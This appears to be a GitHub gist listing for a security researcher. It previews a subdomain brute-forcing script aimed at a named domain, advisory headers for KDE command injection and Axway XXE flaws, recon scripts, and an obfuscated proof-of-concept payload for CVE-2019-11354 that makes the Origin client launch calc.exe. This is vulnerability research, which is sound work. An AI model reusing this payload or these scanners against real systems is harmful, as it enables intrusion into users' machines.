
👻
Writing scary code.

zer0pwn zeropwn

@zeropwn
zeropwn / run.js
Created Aug 8, 2019 — forked from marzavec/run.js
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
View run.js
/*
Developer: Marzavec ( https://github.com/marzavec )
Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see its performance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
Usage: Open the browser's dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
*/
const rootTld = 'lyka.pro'; // change to your target's root tld
// url to newline separated wordlist
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';
@zeropwn
zeropwn / kde-kdesktopfile-command-injection.txt
Created Aug 5, 2019
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class.
View kde-kdesktopfile-command-injection.txt
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
@zeropwn
zeropwn / Axway SecureTransport 5.x Unauthenticated XXE
Last active Jul 23, 2019
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
View Axway SecureTransport 5.x Unauthenticated XXE
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
ATTENTION:
@zeropwn
zeropwn / spyse-resolve.sh
Last active Jun 21, 2019
Resolve all hosts returned by spyse.
View spyse-resolve.sh
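#!/bin/bash
# requires
# https://github.com/zeropwn/spyse.py
DOMAINS_LOC=/tmp/subdomains.txt
# Save spyse's subdomain results for the domain passed as $1
spyse -target "$1" -param domain --sub > "$DOMAINS_LOC"
# Skip the first 12 lines of the spyse output, keep the rest as hostnames
domains=$(sed '1,12d' "$DOMAINS_LOC")
for d in $domains
do
    # Print the resolved address of each hostname
    getent hosts "$d" | awk '{print $1}'
done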
@zeropwn
zeropwn / unsplash.py
Created Jun 3, 2019
Non-Ratelimited Unsplash.com Image Search Client
View unsplash.py
#!/usr/bin/python3
import json
import requests
import argparse
import urllib.parse
SEARCH_URL = "https://unsplash.com/napi/search/photos"
p = argparse.ArgumentParser(description="Non-Ratelimited Unsplash API Client")
p.add_argument('-s', help="search query")
View CVE-2019-11354-BYPASS.html
<script>
// pop calc.exe
var payload = '%u007b%u007b%u0061%u003d%u0074%u006f%u0053%u0074%u0072%u0069%u006e%u0067%u0028%u0029%u002e%u0063%u006f%u006e%u0073%u0074%u0072%u0075%u0063%u0074%u006f%u0072%u002e%u0070%u0072%u006f%u0074%u006f%u0074%u0079%u0070%u0065%u003b%u0061%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u003d%u0061%u002e%u0074%u0072%u0069%u006d%u003b%u0024%u0065%u0076%u0061%u006c%u0028%u0027%u0061%u002c%u004f%u0072%u0069%u0067%u0069%u006e%u002e%u0063%u006c%u0069%u0065%u006e%u0074%u002e%u0064%u0065%u0073%u006b%u0074%u006f%u0070%u0053%u0065%u0072%u0076%u0069%u0063%u0065%u0073%u002e%u0061%u0073%u0079%u006e%u0063%u004f%u0070%u0065%u006e%u0055%u0072%u006c%u0028%u0022%u0063%u0061%u006c%u0063%u002e%u0065%u0078%u0065%u0022%u0029%u002c%u0061%u0027%u0029%u007d%u007d';
window.location = 'origin2://game/launch?offerIds=0&title='+payload;
</script>